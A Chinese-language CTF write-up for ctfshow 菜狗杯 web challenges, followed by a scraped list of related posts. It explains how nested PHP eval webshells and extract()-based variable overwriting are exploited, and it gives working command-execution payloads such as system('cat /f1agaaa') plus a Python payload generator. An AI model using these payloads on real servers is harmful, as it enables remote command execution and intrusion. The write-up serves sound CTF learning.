web签到

主要就是最后这个一句话木马的利用,嵌套的有点多,来理一下:

首先最里面是‘CTFshow-QQ群’,前面是$_COOKIE,也就是取的是cookie中‘CTFshow-QQ群’的值;那如果我们在cookie中传入CTFshow-QQ群=a,那么一句话木马就变成了:

eval($_REQUEST[$_GET[$_POST[a]]][6][0][7][5][8][0][9][4][4]);

那么$_POST[a]就是要以POST方式传入的a参数的值,我们将传入的a=b,那么就变为了:

eval($_REQUEST[$_GET[b]][6][0][7][5][8][0][9][4][4]);

$_GET[b]也就是要以GET方式来传入b参数的值,我们再给b赋值b=c,就得到:

eval($_REQUEST[c][6][0][7][5][8][0][9][4][4]);

$_REQUEST[c][6][0][7][5][8][0][9][4][4],其中$_REQUEST是以任何一种方式请求都可以,c为数组,$_REQUEST请求中传入的值是取的C数组中ID键为[6][0][7][5][8][0][9][4][4]的值。因为PHP数组是可以指定ID键分配值的,那么我们就可以给C数组中的这些键直接赋值:c[6][0][7][5][8][0][9][4][4]= system('ls /');

于是我们用POST形式发包,同时注意“群”要用url编码,否则burp不识别(给c赋值时可以放在请求头也可以放在请求实体中,因为request请求方式无论是用get还是post形式都可以接受,这里放在了请求实体中):

Cookie: CTFshow-QQ%E7%BE%A4:=a

然后我们就得到了如下返回的响应:

很明显f1agaaa就是flag,于是我们再重新设置payload:c[6][0][7][5][8][0][9][4][4]= system('cat /f1agaaa');

最终拿到flag:

总结:注意请求方式和赋值的关系,还有Cookie字段的中文编码问题。

web2 c0me_t0_s1gn

他一开始给了提示,有隐藏信息,于是我们F12一下,看到有

拿到了掐半部分的flag,有提示说需要控制台,于是点开控制台,看到提示:

可以看到提示让我们run函数g1ve_flag()来拿flag,那我们就来运行一下:

就拿到了后半段的flag。

总结:要学会使用开发者工具。

我的眼里只有$

一共这几句代码,主要还是一句话木马里的变量。

extract($_POST);
# 将post上来的数据直接都解析成变量的形式,在代码中可以直接使用
eval($$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$_);
#变量嵌套

eval()函数中的还是变量嵌套(刚开始以为只需要传最后一个$_的值就好了,没想到是不停的变量嵌套),注意都到在POST中传入。首先是给$_赋值:_=a,再给$a赋值,a=b······以此类推一共有36个$,需要赋值36次。也不能手写吧,写个脚本(注意:变量不能出现重复):

import string
list = string.ascii_letters#所有大小写字母
payload="system('ls /');"
print('_=a',end='&')
for i in range(0,34):print(f'{list[i]}={list[i+1]}',end='&')if i==33:print(f'{list[i+1]}={payload}')

运行得到:

_=a&a=b&b=c&c=d&d=e&e=f&f=g&g=h&h=i&i=j&j=k&k=l&l=m&m=n&n=o&o=p&p=q&q=r&r=s&s=t&t=u&u=v&v=w&w=x&x=y&y=z&z=A&A=B&B=C&C=D&D=E&E=F&F=G&G=H&H=I&I=system('ls /')

以POST形式传入,

得到响应:

可以看到flag文件,于是再将payload更改一下:

即可得到flag:

总结:变量覆盖;且变量不能出现重复。

ctfshow-菜狗杯-web(一)相关推荐

  1. CTFSHOW 菜狗杯--WEB

    WEB签到 eval($_REQUEST[$_GET[$_POST[$_COOKIE['CTFshow-QQ群:']]]][6][0][7][5][8][0][9][4][4]); 简单的解释下这个嵌 ...

  2. CTFSHOW菜狗杯 web

    文章目录 web签到 web2 c0me_t0_s1gn 我的眼里只有$ 抽老婆 一言既出 驷马难追 TapTapTap Webshell 化零为整 无一幸免 传说之下(雾) 算力超群 算力升级 2 ...

  3. ctfshow菜狗杯 web 我的眼里只有$

    萌新入坑,防懒细胞滋生 题目有36个$,给出的最后一个$_可以看做变量0 生成从变量1到变量35,最后赋给变量35的值为真正想执行的命令. my_str = '_' for i in range(26 ...

  4. CTFshow菜狗杯-misc-wp(详解 脚本 过程 全)

    首先感谢ctf平台和各位出题的大佬 其次感谢各位读者,对我的支持( •̀ ω •́ )y 有什么问题和建议可以私聊我 废话不多话开启你们的旅程吧 这个也是我这几天才看 一些见解和思路分享给你们 希望你 ...

  5. ctfshow菜狗杯webwp

    web签到 <?php error_reporting(0); highlight_file(__FILE__);eval($_REQUEST[$_GET[$_POST[$_COOKIE['CT ...

  6. ctfshow 菜狗杯 杂项签到MISC1

    题目链接:​​​​​​ctf.show 下载打开发现是一张图片 扔进HEX Workshop看看

  7. ctfshow 菜狗杯 taptap wp

    启动环境 小游戏 看源码 查找关键字score 解码得 访问该路径,拿到flag

  8. ctfshow【菜狗杯】misc

    文章目录 web web签到 web2 c0me_t0_s1gn 我的眼里只有$ 抽老婆 一言既出 驷马难追 TapTapTap Webshell 化零为整 无一幸免 无一幸免_FIXED 传说之下( ...

  9. ctf菜狗杯OSINT wp

    菜狗杯OSINTwp Fish And Turtles 由B-6448和8月27日可以查到由早上赶飞机可以得知flag ctfshow{成都-厦门-3U6953} 碧海蓝天 把他放到搜狗识图![可以得 ...

  10. ctfshow菜鸡杯 部分wp

    参加了ctfshow组织的菜鸡杯,自我感觉还是比较不错的,让自己学习了好多新东西.还有感谢师傅们的耐心解答.真的真的感谢. 1. misc3 这道题考察的是jsfuck编码(参考),直接将编码放入浏览 ...

最新文章

  1. debian 10 ssh简单配置
  2. php tp5生成条形码,thinkphp5 + barcode 生成条形码
  3. 用wget循环获取指定url下的文件
  4. 怎么选择多专业取费_从事翻译要怎么选择行业和专业?
  5. #2002 - 服务器没有响应 (or the local MySQL server's socket is not ...
  6. php取结果集,php获取数据库结果集方法(推荐)
  7. 用truffle部署智能合约到以太坊网络(truffle+infura)的简易方法
  8. Flask--模板渲染和参数传递
  9. 开源移动安全测试框架MobSF安装过程踩过的那些坑(一)
  10. 信号完整性Sigrity2018各组件功能介绍
  11. 医院HIS系统厂家统计
  12. 词根词缀【-vict=vinc】
  13. allow php templates,PHP 返利网 自动返利支持多个电商网站 源码+程序
  14. average函数python_在Python3 numpy中mean和average的区别详解
  15. 华为U-SYS系统力助运营商实施转型
  16. java合并流与文件的分割合并示例
  17. 回首向来萧瑟处,归去,也无风雨也无晴。
  18. python初学的小坑
  19. Vue | 显示切换(v-if与v-show,display,visibility与opacity)
  20. C#小游戏之疯狂字母

热门文章

  1. 执行shellcode一直提示illegal instruction
  2. 云计算和web服务器应用,基于云计算的Web服务选择及应用研究
  3. c语言编程一个超市购物程序,急求一超市的销售记录C程序(各位大哥帮帮忙啊!)...
  4. matlab命令 elempro,装好MATLAB后,The markup in the document preceding the root elem
  5. 2020计算机分数线,成都计算机电子信息学校2020年招生录取分数线
  6. Unity 接入腾讯Bugly
  7. As a developer —— dotNet —— 01VB是什么
  8. {转载}——jvm verbose 参数详解
  9. keepalived 中关于 weight 和 preempt_delay 的实验
  10. LeedCode 717 1比特与2比特字符